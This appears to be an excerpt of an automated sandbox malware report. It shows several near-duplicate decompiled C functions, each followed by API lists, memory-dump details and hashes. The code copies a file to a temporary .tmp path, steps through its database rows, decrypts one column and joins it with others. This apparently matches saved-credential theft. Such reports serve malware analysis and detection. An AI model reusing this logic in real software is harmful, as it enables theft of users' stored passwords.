                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                          				WCHAR* _t91;
                                                                                                                                                                                          				intOrPtr* _t106;
                                                                                                                                                                                          				intOrPtr _t108;
                                                                                                                                                                                          				intOrPtr* _t110;
                                                                                                                                                                                          				intOrPtr* _t114;
                                                                                                                                                                                          				intOrPtr* _t151;
                                                                                                                                                                                          				intOrPtr _t153;
                                                                                                                                                                                          				intOrPtr* _t155;
                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                          				intOrPtr* _t159;
                                                                                                                                                                                          				intOrPtr* _t163;
                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                          				intOrPtr* _t170;
                                                                                                                                                                                          				intOrPtr* _t176;
                                                                                                                                                                                          				intOrPtr* _t182;
                                                                                                                                                                                          				void* _t184;
                                                                                                                                                                                          				intOrPtr* _t188;
                                                                                                                                                                                          				void* _t192;
                                                                                                                                                                                          				intOrPtr _t213;
                                                                                                                                                                                          				intOrPtr _t215;
                                                                                                                                                                                          				void* _t221;
                                                                                                                                                                                          				intOrPtr _t227;
                                                                                                                                                                                          				intOrPtr _t231;
                                                                                                                                                                                          				intOrPtr _t232;
                                                                                                                                                                                          				void* _t233;
                                                                                                                                                                                          				void* _t234;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t229 = __esi;
                                                                                                                                                                                          				_t190 = __ebx;
                                                                                                                                                                                          				_pop(_t232);
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				 *__ecx =  *__ecx + __ecx;
                                                                                                                                                                                          				 *__eax =  *__eax | __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_t70 = __eax;
                                                                                                                                                                                          				 *_t70 =  *_t70 + _t70;
                                                                                                                                                                                          				_t71 = _t70 | 0x00000a00;
                                                                                                                                                                                          				 *_t71 =  *_t71 + _t71;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t231 = _t232;
                                                                                                                                                                                          				_t192 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t192 = _t192 - 1;
                                                                                                                                                                                          					_t242 = _t192;
                                                                                                                                                                                          				} while (_t192 != 0);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t71;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t231);
                                                                                                                                                                                          				_push(0x411163);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t232;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t231);
                                                                                                                                                                                          				_push(0x4110ce);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t232;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t242);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				E00406F1C( &_v56, __ebx, __edi, __esi, _t242);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t190,  &_v40, _t242);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v64, _t242);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				_push(0x41119c);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v60, _t190,  &_v44, _t242);
                                                                                                                                                                                          				_t91 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v68, _v44);
                                                                                                                                                                                          				E00404AFC(_v68, _t190, _t192,  &_v36, _t229, _t242);
                                                                                                                                                                                          				E00403D2C( &_v72, _v36);
                                                                                                                                                                                          				if(E004076B0(_v72, _t190, _t192) != 0) {
                                                                                                                                                                                          					_t106 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t233 = _t232 + 8;
                                                                                                                                                                                          					__eflags = _t108;
                                                                                                                                                                                          					if(_t108 == 0) {
                                                                                                                                                                                          						E00408120(0x66,  &_v76);
                                                                                                                                                                                          						_t151 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t234 = _t233 + 0x14;
                                                                                                                                                                                          						__eflags = _t153;
                                                                                                                                                                                          						if(_t153 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t155 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t157 =  *((intOrPtr*)( *_t155))(_v20);
                                                                                                                                                                                          								__eflags = _t157 - 0x64;
                                                                                                                                                                                          								if(_t157 != 0x64) {
                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t159 =  *0x41b644; // 0x41c798
                                                                                                                                                                                          								_t163 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
                                                                                                                                                                                          								_pop(_t221);
                                                                                                                                                                                          								E004094C4(_t165,  &_v48, _t221);
                                                                                                                                                                                          								E00403D2C( &_v80, _v48);
                                                                                                                                                                                          								_t170 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
                                                                                                                                                                                          								_t176 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
                                                                                                                                                                                          								_t182 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
                                                                                                                                                                                          								_t234 = _t234 + 0x28;
                                                                                                                                                                                          								E00403C98( &_v92, _t184);
                                                                                                                                                                                          								_push(_v92);
                                                                                                                                                                                          								_push(L"\r\n\r\n");
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          								_t188 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                          								 *_t188 =  *_t188 + 1;
                                                                                                                                                                                          								__eflags =  *_t188;
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L12:
                                                                                                                                                                                          					_t110 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t110))(_v20);
                                                                                                                                                                                          					_t114 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t114))(_v16);
                                                                                                                                                                                          					_pop(_t213);
                                                                                                                                                                                          					 *[fs:eax] = _t213;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t227);
                                                                                                                                                                                          					 *[fs:eax] = _t227;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t215);
                                                                                                                                                                                          				 *[fs:eax] = _t215;
                                                                                                                                                                                          				_push(E0041116A);
                                                                                                                                                                                          				E00403B98( &_v92, 4);
                                                                                                                                                                                          				E004034E4( &_v76);
                                                                                                                                                                                          				E00403B80( &_v72);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B98( &_v64, 4);
                                                                                                                                                                                          				E004034E4( &_v48);
                                                                                                                                                                                          				E00403B98( &_v44, 2);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}
                                                                                                                                                                                          0x00410edc
                                                                                                                                                                                          0x00410ee7
                                                                                                                                                                                          0x00410ef4
                                                                                                                                                                                          0x00410ef9
                                                                                                                                                                                          0x00410efc
                                                                                                                                                                                          0x00410f01
                                                                                                                                                                                          0x00410f0c
                                                                                                                                                                                          0x00410f17
                                                                                                                                                                                          0x00410f21
                                                                                                                                                                                          0x00410f30
                                                                                                                                                                                          0x00410f3b
                                                                                                                                                                                          0x00410f46
                                                                                                                                                                                          0x00410f51
                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                          • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                                                                                                                                                                                          • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00410E60(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                          				signed int _t71;
                                                                                                                                                                                          				WCHAR* _t91;
                                                                                                                                                                                          				intOrPtr* _t106;
                                                                                                                                                                                          				intOrPtr _t108;
                                                                                                                                                                                          				intOrPtr* _t110;
                                                                                                                                                                                          				intOrPtr* _t114;
                                                                                                                                                                                          				intOrPtr* _t151;
                                                                                                                                                                                          				intOrPtr _t153;
                                                                                                                                                                                          				intOrPtr* _t155;
                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                          				intOrPtr* _t159;
                                                                                                                                                                                          				intOrPtr* _t163;
                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                          				intOrPtr* _t170;
                                                                                                                                                                                          				intOrPtr* _t176;
                                                                                                                                                                                          				intOrPtr* _t182;
                                                                                                                                                                                          				void* _t184;
                                                                                                                                                                                          				intOrPtr* _t188;
                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                          				intOrPtr _t212;
                                                                                                                                                                                          				intOrPtr _t214;
                                                                                                                                                                                          				void* _t220;
                                                                                                                                                                                          				intOrPtr _t226;
                                                                                                                                                                                          				intOrPtr _t230;
                                                                                                                                                                                          				intOrPtr _t231;
                                                                                                                                                                                          				void* _t232;
                                                                                                                                                                                          				void* _t233;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t228 = __esi;
                                                                                                                                                                                          				_t190 = __ebx;
                                                                                                                                                                                          				 *__eax =  *__eax | __eax;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_t70 = __eax;
                                                                                                                                                                                          				 *_t70 =  *_t70 + _t70;
                                                                                                                                                                                          				_t71 = _t70 | 0x00000a00;
                                                                                                                                                                                          				 *_t71 =  *_t71 + _t71;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t230 = _t231;
                                                                                                                                                                                          				_t191 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t191 = _t191 - 1;
                                                                                                                                                                                          					_t240 = _t191;
                                                                                                                                                                                          				} while (_t191 != 0);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = _t71;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t230);
                                                                                                                                                                                          				_push(0x411163);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t231;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t230);
                                                                                                                                                                                          				_push(0x4110ce);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t231;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t240);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				E00406F1C( &_v56, __ebx, __edi, __esi, _t240);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t190,  &_v40, _t240);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v64, _t240);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				_push(0x41119c);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v60, _t190,  &_v44, _t240);
                                                                                                                                                                                          				_t91 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v68, _v44);
                                                                                                                                                                                          				E00404AFC(_v68, _t190, _t191,  &_v36, _t228, _t240);
                                                                                                                                                                                          				E00403D2C( &_v72, _v36);
                                                                                                                                                                                          				if(E004076B0(_v72, _t190, _t191) != 0) {
                                                                                                                                                                                          					_t106 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t232 = _t231 + 8;
                                                                                                                                                                                          					__eflags = _t108;
                                                                                                                                                                                          					if(_t108 == 0) {
                                                                                                                                                                                          						E00408120(0x66,  &_v76);
                                                                                                                                                                                          						_t151 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t233 = _t232 + 0x14;
                                                                                                                                                                                          						__eflags = _t153;
                                                                                                                                                                                          						if(_t153 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t155 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t157 =  *((intOrPtr*)( *_t155))(_v20);
                                                                                                                                                                                          								__eflags = _t157 - 0x64;
                                                                                                                                                                                          								if(_t157 != 0x64) {
                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t159 =  *0x41b644; // 0x41c798
                                                                                                                                                                                          								_t163 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
                                                                                                                                                                                          								_pop(_t220);
                                                                                                                                                                                          								E004094C4(_t165,  &_v48, _t220);
                                                                                                                                                                                          								E00403D2C( &_v80, _v48);
                                                                                                                                                                                          								_t170 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
                                                                                                                                                                                          								_t176 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
                                                                                                                                                                                          								_t182 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
                                                                                                                                                                                          								_t233 = _t233 + 0x28;
                                                                                                                                                                                          								E00403C98( &_v92, _t184);
                                                                                                                                                                                          								_push(_v92);
                                                                                                                                                                                          								_push(L"\r\n\r\n");
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          								_t188 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                          								 *_t188 =  *_t188 + 1;
                                                                                                                                                                                          								__eflags =  *_t188;
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L11:
                                                                                                                                                                                          					_t110 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t110))(_v20);
                                                                                                                                                                                          					_t114 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t114))(_v16);
                                                                                                                                                                                          					_pop(_t212);
                                                                                                                                                                                          					 *[fs:eax] = _t212;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t226);
                                                                                                                                                                                          					 *[fs:eax] = _t226;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t214);
                                                                                                                                                                                          				 *[fs:eax] = _t214;
                                                                                                                                                                                          				_push(E0041116A);
                                                                                                                                                                                          				E00403B98( &_v92, 4);
                                                                                                                                                                                          				E004034E4( &_v76);
                                                                                                                                                                                          				E00403B80( &_v72);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B98( &_v64, 4);
                                                                                                                                                                                          				E004034E4( &_v48);
                                                                                                                                                                                          				E00403B98( &_v44, 2);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}
                                                                                                                                                                                          0x00410ef4
                                                                                                                                                                                          0x00410ef9
                                                                                                                                                                                          0x00410efc
                                                                                                                                                                                          0x00410f01
                                                                                                                                                                                          0x00410f0c
                                                                                                                                                                                          0x00410f17
                                                                                                                                                                                          0x00410f21
                                                                                                                                                                                          0x00410f30
                                                                                                                                                                                          0x00410f3b
                                                                                                                                                                                          0x00410f46
                                                                                                                                                                                          0x00410f51
                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CopyCountFileTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 3448371392-3650661790
                                                                                                                                                                                          • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                          • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                                                                                                                                                                                          • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410E68(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                          				WCHAR* _t90;
                                                                                                                                                                                          				intOrPtr* _t105;
                                                                                                                                                                                          				intOrPtr _t107;
                                                                                                                                                                                          				intOrPtr* _t109;
                                                                                                                                                                                          				intOrPtr* _t113;
                                                                                                                                                                                          				intOrPtr* _t150;
                                                                                                                                                                                          				intOrPtr _t152;
                                                                                                                                                                                          				intOrPtr* _t154;
                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                          				intOrPtr* _t158;
                                                                                                                                                                                          				intOrPtr* _t162;
                                                                                                                                                                                          				void* _t164;
                                                                                                                                                                                          				intOrPtr* _t169;
                                                                                                                                                                                          				intOrPtr* _t175;
                                                                                                                                                                                          				intOrPtr* _t181;
                                                                                                                                                                                          				void* _t183;
                                                                                                                                                                                          				intOrPtr* _t187;
                                                                                                                                                                                          				void* _t190;
                                                                                                                                                                                          				intOrPtr _t211;
                                                                                                                                                                                          				intOrPtr _t213;
                                                                                                                                                                                          				void* _t219;
                                                                                                                                                                                          				intOrPtr _t225;
                                                                                                                                                                                          				intOrPtr _t229;
                                                                                                                                                                                          				intOrPtr _t230;
                                                                                                                                                                                          				void* _t231;
                                                                                                                                                                                          				void* _t232;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t227 = __esi;
                                                                                                                                                                                          				_t189 = __ebx;
                                                                                                                                                                                          				_t70 = __eax | 0x00000a00;
                                                                                                                                                                                          				 *_t70 =  *_t70 + _t70;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t229 = _t230;
                                                                                                                                                                                          				_t190 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t190 = _t190 - 1;
                                                                                                                                                                                          					_t238 = _t190;
                                                                                                                                                                                          				} while (_t190 != 0);
